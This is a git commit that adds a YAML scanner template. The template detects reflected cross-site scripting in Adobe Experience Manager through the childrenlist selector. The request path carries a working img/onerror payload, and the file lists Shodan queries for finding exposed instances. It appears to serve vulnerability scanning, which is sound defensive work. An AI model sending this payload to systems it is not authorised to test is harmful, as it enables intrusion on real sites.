Create aem-childrenlist-xss.yaml (#6537)

* Create aem-xss.yaml * Update and rename aem-xss.yaml to aem-childrenlist-xss.yaml * Update aem-childrenlist-xss.yaml * few-changes * metadata-corrected * added more matchers Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-01-15 18:59:59 +05:30 · 2023-01-15 18:59:59 +05:30 · 239629b61a
parent c534469294
commit 239629b61a
1 changed files with 38 additions and 0 deletions
--- a/misconfiguration/aem/aem-childrenlist-xss.yaml
+++ b/misconfiguration/aem/aem-childrenlist-xss.yaml
@ -0,0 +1,38 @@
+id: aem-xss-childlist
+
+info:
+  name: Adobe Experience Manager - Childlist selector Cross-Site Scripting
+  author: theabhinavgaur
+  severity: medium
+  description: |
+    Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser.
+  metadata:
+    verified: true
+    shodan-query:
+      - http.title:"AEM Sign In"
+      - http.component:"Adobe Experience Manager"
+  tags: xss,aem,adobe
+
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/{{rand_base(4)}}{{rand_base(5)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<img src="x" data onerror="alert(domain)"/>'
+          - 'data-coral-columnview-id'
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200